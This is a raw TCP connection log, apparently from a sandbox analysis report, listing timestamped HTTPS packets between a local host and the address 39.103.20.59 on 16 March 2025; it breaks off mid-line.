                                                                                                                                                        Mar 16, 2025 05:20:30.262506962 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.262630939 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.262679100 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.262716055 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.262762070 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.262794018 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.262842894 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.263322115 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.263375044 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.263788939 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.263845921 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.263966084 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.263998032 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.264008045 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.264014006 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.264046907 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.264071941 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.264133930 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.264195919 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.265682936 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.265743971 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.265820026 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.265866995 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.267716885 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.267822981 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.269486904 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.269548893 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.269567013 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.269572973 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.269599915 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.269623041 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349062920 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349107981 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349131107 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349175930 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349360943 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349406004 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349522114 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349564075 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349575996 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349606991 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349611044 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349654913 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.349684000 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.349725008 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.365711927 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.365724087 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.388418913 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.388464928 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.388681889 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.388885975 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.388900995 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.595829964 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.595896006 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.596461058 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.596470118 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.596787930 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.596792936 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.939805984 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.939826965 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.939888000 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.939908028 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.939918995 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.939954042 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.951380968 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.951411963 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.951438904 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.951447010 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:31.951471090 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:31.951493025 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.158849001 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.158890009 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.158907890 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.158941031 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.158962011 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.158976078 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.159600019 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.159638882 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.159646988 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.159657001 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.159683943 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.159699917 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.160592079 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.160621881 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.160639048 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.160646915 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.160670996 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.160692930 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.161545992 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.161598921 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.378715038 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.378777981 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.378807068 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.378854990 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.379739046 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.379781008 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.379790068 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.379801035 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.379818916 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.379842043 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.379972935 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.380033016 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.380150080 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.380193949 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.380558014 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.380611897 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.380614042 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.380621910 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.380650997 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.380669117 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.381309986 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.381342888 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.381361961 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.381367922 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.381387949 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.381412029 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.382420063 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.382452011 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.382471085 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.382476091 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.382487059 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.382509947 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.382529974 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.382534027 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.382663965 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.383254051 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.383299112 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601073980 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601140022 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601174116 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601200104 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601218939 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601227045 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601238966 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601264954 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601335049 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601382017 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601515055 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601552963 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601560116 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601567984 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601582050 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601592064 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601599932 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601603031 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601636887 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601660967 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601682901 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601725101 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601738930 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601782084 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601898909 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.601943016 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.601986885 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.602032900 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.602229118 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.602267981 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.602292061 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.602334976 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.602425098 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.602471113 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.605776072 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.605829954 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.605838060 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.605885983 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.605922937 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.605962038 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.605990887 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606033087 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606365919 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606398106 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606412888 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606421947 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606431007 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606456995 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606584072 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606612921 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606631041 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606638908 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606654882 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606682062 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606683969 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606693029 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606733084 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606743097 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606872082 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.606909037 CET49729443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:32.606939077 CET4434972939.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:32.60